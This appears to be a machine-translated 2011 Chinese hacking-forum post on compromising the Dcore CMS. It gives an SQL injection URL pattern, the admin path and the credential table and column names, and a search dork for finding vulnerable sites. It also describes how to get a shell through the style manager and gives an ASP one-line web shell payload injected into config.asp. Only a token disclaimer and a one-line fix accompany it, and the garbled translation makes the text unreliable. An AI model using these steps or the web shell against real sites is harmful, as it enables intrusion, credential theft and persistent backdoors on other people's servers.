Dcore(lightweight CMS)backend to get the SHELL method and repair method-vulnerability warning-the black bar safety net

ID MYHACK58:62201130219
Type myhack58
Reporter 佚名
Modified 2011-04-27T00:00:00


Author: Mr. DzY

Increase the style with the site table of the Association;

Background: admin/login. asp if does not exist, the self-guess solution.

Injection point:http://www. xxxx. net/index. asp? subsite=1

In tool to increase the table name: dcore_user column name: user_admin user_password

If not afraid of trouble, also you can manually guess the solution.

Get the shell methods:

Background--->style Manager--->choose any style modifications as Mr. DzY. asp--->edit skin.

Test keywords: inurl:dynamic.asp?/1-2-17.html

A lot of their structure. Or that old words, the law does not allow, please do not illegally hacking into the site and the destruction of others data.

This article is only for technology exchange. Its caused by the consequences themselves. I am not responsible for it.

Repair method: the enhanced password strength/filtering illegal characters/modify the default path

By this 0DAY is very easy to take down the SHELL. Thank the ancestors for dedication huh?

Then see the procedure found in the root directory of the file config. asp, is the site configuration, that is the background to directly modify the site configuration information is written Word will be able to connect, and the South data enterprise website management system background like

Directly in the version information added on the"%><%eval request("#")%><%' added after, does not display the code, or the original look, but in fact can already.

Directly behind the word connection of the http://wwww. xxxx. net/config. asp